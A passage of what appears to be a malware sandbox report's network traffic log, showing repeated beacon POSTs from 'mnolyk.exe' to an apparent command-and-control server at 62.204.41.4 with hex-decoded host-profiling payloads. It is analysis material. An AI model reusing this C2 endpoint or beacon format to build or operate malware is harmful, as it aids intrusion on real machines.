                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:03.097748041 CET367INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    167192.168.2.34986962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:03.296837091 CET368OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:03.360726118 CET368INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    168192.168.2.34987062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:03.546237946 CET369OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:03.608895063 CET369INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    169192.168.2.34987162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:03.779794931 CET370OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:03.844167948 CET370INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    17192.168.2.34971862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:15.921504021 CET218OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:15.985985994 CET218INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    170192.168.2.34987262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:04.015501976 CET371OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:04.082180023 CET371INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    171192.168.2.34987362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:04.268049002 CET371OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:04.331665039 CET372INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    172192.168.2.34987462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:04.500032902 CET373OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:04.563184023 CET373INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    173192.168.2.34987562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:04.746049881 CET374OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:04.810132980 CET374INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    174192.168.2.34987662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:04.982214928 CET375OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:05.048247099 CET375INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    175192.168.2.34987762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:05.223018885 CET375OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:05.286161900 CET376INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    176192.168.2.34987862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:05.452116966 CET377OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:05.518059969 CET377INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    177192.168.2.34987962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:05.692639112 CET378OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:05.757045984 CET378INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    178192.168.2.34988062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:05.941168070 CET379OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:06.007395029 CET379INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    179192.168.2.34988162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:06.188564062 CET380OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:06.255192995 CET380INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    18192.168.2.34971962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:17.030553102 CET219OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:17.097150087 CET219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    180192.168.2.34988262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:06.440098047 CET380OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:06.503624916 CET381INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    181192.168.2.34988362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:06.680162907 CET382OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:06.744971037 CET382INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    182192.168.2.34988462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:06.923409939 CET383OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:06.988398075 CET383INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    183192.168.2.34988562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:07.169003963 CET384OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:07.232494116 CET384INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    184192.168.2.34988662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:07.408943892 CET385OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
